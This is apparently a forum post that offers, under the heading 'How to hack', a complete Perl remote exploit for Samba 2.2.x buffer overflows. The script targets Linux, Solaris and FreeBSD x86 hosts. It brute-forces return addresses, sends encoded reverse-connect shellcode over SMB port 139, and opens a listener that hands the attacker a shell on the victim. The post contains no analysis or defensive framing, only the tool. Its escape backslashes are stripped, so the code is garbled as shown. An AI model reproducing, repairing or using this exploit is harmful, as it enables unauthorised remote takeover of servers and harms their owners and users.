Haaaa, take a look at this dude
How to hack:
I using this code
[src]
use strict;
use Socket;
use IO::Socket;
use IO::Select;
use POSIX;
use Getopt::Std;
$SIG{USR2} = &GoAway;
my %args;
my %targets =
(
"linx86" => [0xbffff3ff, 0xbfffffff, 0xbf000000, 512, &CreateBuffer_linx86],
"solx86" => [0x08047404, 0x08047ffc, 0x08010101, 512, &CreateBuffer_solx86],
"fbsdx86" => [0xbfbfefff, 0xbfbfffff, 0xbf000000, 512, &CreateBuffer_bsdx86],
# name # default # start # end # step # function
);
getopt('t:M:h:r:H:P:', %args);
my $target_type = $args{t} || Usage();
my $target_host = $args{h} || Usage();
my $local_host = $args{H} || Usage();
my $local_port = $args{P} || 1981;
my $target_port = $args{p} || 139;
my $target_mode = "brute";
if (! exists($targets{$target_type})) { Usage(); }
print "[*] Using target type: $target_typen";
# allow single mode via the -M option
if ($args{M} && uc($args{M}) eq "S")
{
$target_mode = "single";
}
# the parent process listens for an incoming connection
# the child process handles the actual exploitation
my $listen_pid = $$;
my $exploit_pid = StartListener($local_port);
# get the default return address for single mode
my $targ_ret = $args{r} || $targets{$target_type}->[0];
my $curr_ret;
$targ_ret = eval($targ_ret);
if ($target_mode !~ /brute|single/)
{
print "[*] Invalid attack mode: $target_mode (single or brute only)n";
exit(0);
}
if ($target_mode eq "single")
{
$curr_ret = $targ_ret;
if(! $targ_ret)
{
print "[*] Invalid return address specified!n";
kill("USR2", $listen_pid);
exit(0);
}
print "[*] Starting single shot mode...n";
printf ("[*] Using return address of 0x%.8xn", $targ_ret);
my $buf = $targets{$target_type}->[4]->($local_host, $local_port, $targ_ret);
my $ret = AttemptExploit($target_host, $target_port, $buf);
sleep(2);
kill("USR2", $listen_pid);
exit(0);
}
if ($target_mode eq "brute")
{
print "[*] Starting brute force mode...n";
for (
$curr_ret =$targets{$target_type}->[1];
$curr_ret >= $targets{$target_type}->[2];
$curr_ret -=$targets{$target_type}->[3]
)
{
select(STDOUT); $|++;
my $buf = $targets{$target_type}->[4]->($local_host, $local_port, $curr_ret);
printf (" r[*] Return Address: 0x%.8x", $curr_ret);
my $ret = AttemptExploit($target_host, $target_port, $buf);
}
sleep(2);
kill("USR2", $listen_pid);
exit(0);
}
sub Usage {
print STDERR "n";
print STDERR " samba-2-2-x.pl - Samba 2.2.x Remote Exploitn";
print STDERR "===================================nn";
print STDERR " Usage: n";
print STDERR " $0 <options> -t <target type> -H <your ip> -h <target ip>n";
print STDERR " Options: n";
print STDERR " -M (S|<single or brute mode>n";
print STDERR " -r <return address for single mode>n";
print STDERR " -p <alternate Samba port>n";
print STDERR " -P <alternate listener port>n";
print STDERR " Targets:n";
foreach my $type (keys(%targets))
{
print STDERR " $typen";
}
print STDERR "n";
exit(1);
}
sub StartListener {
my ($local_port) = @_;
my $listen_pid = $$;
my $s = IO::Socket::INET->new (
Proto => "tcp",
LocalPort => $local_port,
Type => SOCK_STREAM,
Listen => 3,
ReuseAddr => 1
);
if (! $s)
{
print "[*] Could not start listener: $!n";
exit(0);
}
print "[*] Listener started on port $local_portn";
my $exploit_pid = fork();
if ($exploit_pid)
{
my $victim;
$SIG{USR2} = &GoAway;
while ($victim = $s->accept())
{
kill("USR2", $exploit_pid);
print STDOUT "n[*] Starting Shell " . $victim->peerhost . ":" . $victim->peerport . "nn";
StartShell($victim);
}
exit(0);
}
return ($exploit_pid);
}
sub StartShell {
my ($client) = @_;
my $sel = IO::Select->new();
Unblock(*STDIN);
Unblock(*STDOUT);
Unblock($client);
select($client); $|++;
select(STDIN); $|++;
select(STDOUT); $|++;
$sel->add($client);
$sel->add(*STDIN);
print $client "echo --=[ Welcome to `hostname` (`id`)n";
print $client "echo n";
while (fileno($client))
{
my $fd;
my @fds = $sel->can_read(0.2);
foreach $fd (@fds)
{
my @in = <$fd>;
if(! scalar(@in)) { next; }
if (! $fd || ! $client)
{
print "[*] Closing connection.n";
close($client);
exit(0);
}
if ($fd eq $client)
{
print STDOUT join("", @in);
} else {
print $client join("", @in);
}
}
}
close ($client);
}
sub AttemptExploit {
my ($Host, $Port, $Exploit) = @_;
my $res;
my $s = IO::Socket::INET->new(PeerAddr => $Host, PeerPort => $Port, Type => SOCK_STREAM, Protocol => "tcp");
if (! $s)
{
print "n[*] Error: could not connect: $!n";
kill("USR2", $listen_pid);
exit(0);
}
select($s); $|++;
select(STDOUT); $|++;
Unblock($s);
my $SetupSession =
"x00x00x00x2exffx53x4dx42x73x00x00x00x00x08".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00xffx00x00x00x00x20x02x00x01".
"x00x00x00x00";
my $TreeConnect =
"x00x00x00x3cxffx53x4dx42x70x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x64x00".
"x00x00x64x00x00x00x00x00x00x00x5cx5cx69x70x63x24".
"x25x6ex6fx62x6fx64x79x00x00x00x00x00x00x00x49x50".
"x43x24";
my $Flush = ("x00" x 808);
print $s $SetupSession;
$res = ReadResponse($s);
print $s $TreeConnect;
$res = ReadResponse($s);
# uncomment this for diagnostics
#print "[*] Press Enter to Continue...n";
#$res = <STDIN>;
#print "[*] Sending Exploit Buffer...n";
print $s $Exploit;
print $s $Flush;
ReadResponse($s);
close($s);
}
sub CreateBuffer_linx86 {
my ($Host, $Port, $Return) = @_;
my $RetAddr = eval($Return);
$RetAddr = pack("l", $RetAddr);
my ($a1, $a2, $a3, $a4) = split(//, gethostbyname($Host));
$a1 = chr(ord($a1) ^ 0x93);
$a2 = chr(ord($a2) ^ 0x93);
$a3 = chr(ord($a3) ^ 0x93);
$a4 = chr(ord($a4) ^ 0x93);
my ($p1, $p2) = split(//, reverse(pack("s", $Port)));
$p1 = chr(ord($p1) ^ 0x93);
$p2 = chr(ord($p2) ^ 0x93);
my $exploit =
# trigger the samba-2-2-x.pl overflow
"x00x04x08x20xffx53x4dx42x32x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00".
"x64x00x00x00x00xd0x07x0cx00xd0x07x0cx00x00x00x00".
"x00x00x00x00x00x00x00xd0x07x43x00x0cx00x14x08x01".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x90".
GetNops(772) .
# xor decoder courtesy of hsj
"xebx02xebx05xe8xf9xffxffxffx58x83xc0x1bx8dxa0x01".
"xfcxffxffx83xe4xfcx8bxecx33xc9x66xb9x99x01x80x30".
"x93x40xe2xfa".
# reverse-connect, mangled lamagra code + fixes
"x1ax76xa2x41x21xf5x1ax43xa2x5ax1ax58xd0x1axcex6b".
"xd0x1axcex67xd8x1axdex6fx1exdex67x5ex13xa2x5ax1a".
"xd6x67xd0xf5x1axcex7fxf5x54xd6x7d".
$p1.$p2 ."x54xd6x63". $a1.$a2.$a3.$a4.
"x1exd6x7fx1axd6x6bx55xd6x6fx83x1ax43xd0x1exdex67".
"x5ex13xa2x5ax03x18xcex67xa2x53xbex52x6cx6cx6cx5e".
"x13xd2xa2x41x12x79x6ex6cx6cx6cxaax42xe6x79x78x8b".
"xcdx1axe6x9bxa2x53x1bxd5x94x1axd6x9fx23x98x1ax60".
"x1exdex9bx1exc6x9fx5ex13x7bx70x6cx6cx6cxbcxf1xfa".
"xfdxbcxe0xfb".
GetNops(87).
($RetAddr x 8).
"DDI!". ("x00" x 277);
return $exploit;
}
sub CreateBuffer_solx86 {
my ($Host, $Port, $Return) = @_;
my $RetAddr = eval($Return);
my $IckAddr = $RetAddr - 512;
$RetAddr = pack("l", $RetAddr);
$IckAddr = pack("l", $IckAddr);
# IckAddr needs to point to a writable piece of memory
my ($a1, $a2, $a3, $a4) = split(//, gethostbyname($Host));
$a1 = chr(ord($a1) ^ 0x93);
$a2 = chr(ord($a2) ^ 0x93);
$a3 = chr(ord($a3) ^ 0x93);
$a4 = chr(ord($a4) ^ 0x93);
my ($p1, $p2) = split(//, reverse(pack("s", $Port)));
$p1 = chr(ord($p1) ^ 0x93);
$p2 = chr(ord($p2) ^ 0x93);
my $exploit =
# trigger the samba-2-2-x.pl overflow
"x00x04x08x20xffx53x4dx42x32x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00".
"x64x00x00x00x00xd0x07x0cx00xd0x07x0cx00x00x00x00".
"x00x00x00x00x00x00x00xd0x07x43x00x0cx00x14x08x01".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x90".
GetNops(813) .
# xor decoder courtesy of hsj
"xebx02xebx05xe8xf9xffxffxffx58x83xc0x1bx8dxa0x01".
"xfcxffxffx83xe4xfcx8bxecx33xc9x66xb9x99x01x80x30".
"x93x40xe2xfa".
# reverse-connect, code by bighawk
"x2bx6cx6bx6cxafx64x43xc3xa2x53x23x09xc3x1ax76xa2".
"x5axc2xd2xd2xc2xc2x23x75x6cx46xa2x41x1ax54xfb".
$a1.$a2.$a3.$a4 ."xf5xfb". $p1.$p2.
"xf5xc2x1ax75xf9x83xc5xc4x23x78x6cx46xa2x41x21x9a".
"xc2xc1xc4x23xadx6cx46xdaxeax61xc3xfbxbcxbcxe0xfb".
"xfbxbcxf1xfaxfdx1ax70xc3xc0x1ax71xc3xc1xc0x23xa8".
"x6cx46".
GetNops(87) .
"010101".
$RetAddr.
$IckAddr.
$RetAddr.
$IckAddr.
"101010".
"DDI!". ("x00" x 277);
return $exploit;
}
sub CreateBuffer_bsdx86 {
my ($Host, $Port, $Return) = @_;
my $RetAddr = eval($Return);
my $IckAddr = $RetAddr - 512;
$RetAddr = pack("l", $RetAddr);
$IckAddr = pack("l", $IckAddr);
# IckAddr needs to point to a writable piece of memory
my ($a1, $a2, $a3, $a4) = split(//, gethostbyname($Host));
$a1 = chr(ord($a1) ^ 0x93);
$a2 = chr(ord($a2) ^ 0x93);
$a3 = chr(ord($a3) ^ 0x93);
$a4 = chr(ord($a4) ^ 0x93);
my ($p1, $p2) = split(//, reverse(pack("s", $Port)));
$p1 = chr(ord($p1) ^ 0x93);
$p2 = chr(ord($p2) ^ 0x93);
my $exploit =
# trigger the samba-2-2-x.pl overflow
"x00x04x08x20xffx53x4dx42x32x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00".
"x64x00x00x00x00xd0x07x0cx00xd0x07x0cx00x00x00x00".
"x00x00x00x00x00x00x00xd0x07x43x00x0cx00x14x08x01".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x90".
GetNops(830) .
# xor decoder courtesy of hsj
"xebx02xebx05xe8xf9xffxffxffx58x83xc0x1bx8dxa0x01".
"xfcxffxffx83xe4xfcx8bxecx33xc9x66xb9x99x01x80x30".
"x93x40xe2xfa".
# reverse-connect, code by bighawk
"xa2x5ax64x72xc2xd2xc2xd2xc2xc2x23xf2x5ex13x1ax50".
"xfb". $a1.$a2.$a3.$a4 ."xf5xfb". $p1.$p2.
"xf5xc2x1ax75x21x83xc1xc5xc3xc3x23xf1x5ex13xd2x23".
"xc9xdaxc2xc0xc0x5ex13xd2x71x66xc2xfbxbcxbcxe0xfb".
"xfbxbcxf1xfaxfdx1ax70xc2xc7xc0xc0x23xa8x5ex13".
GetNops(87) .
"010101".
$RetAddr.
$IckAddr.
$RetAddr.
$IckAddr.
"101010".
"DDI!". ("x00" x 277);
return $exploit;
}
sub Unblock {
my $fd = shift;
my $flags;
$flags = fcntl($fd,F_GETFL,0) || die "Can't get flags for file handle: $!n";
fcntl($fd, F_SETFL, $flags|O_NONBLOCK) || die "Can't make handle nonblocking: $!n";
}
sub GoAway {
exit(0);
}
sub ReadResponse {
my ($s) = @_;
my $sel = IO::Select->new($s);
my $res;
my @fds = $sel->can_read(4);
foreach (@fds) { $res .= <$s>; }
return $res;
}
sub HexDump {
my ($data) = @_;
my @x = split(//, $data);
my $cnt = 0;
foreach my $h (@x)
{
if ($cnt > 16)
{
print "n";
$cnt = 0;
}
printf("x%.2x", ord($h));
$cnt++;
}
print "n";
}
# thank you k2
sub GetNops {
my ($cnt) = @_;
my @nops = split(//,"x99x96x97x95x93x91x90x4dx48x47x4fx40x41x37x3fx97".
"x46x4exf8x92xfcx98x27x2fx9fxf9x4ax44x42x43x49x4b".
"xf5x45x4c");
return join ("", @nops[ map { rand @nops } ( 1 .. $cnt )]);
}
[/src]
Reply With Quote
ขอบคุณนะครับที่ไม่ได้ทำอะไร
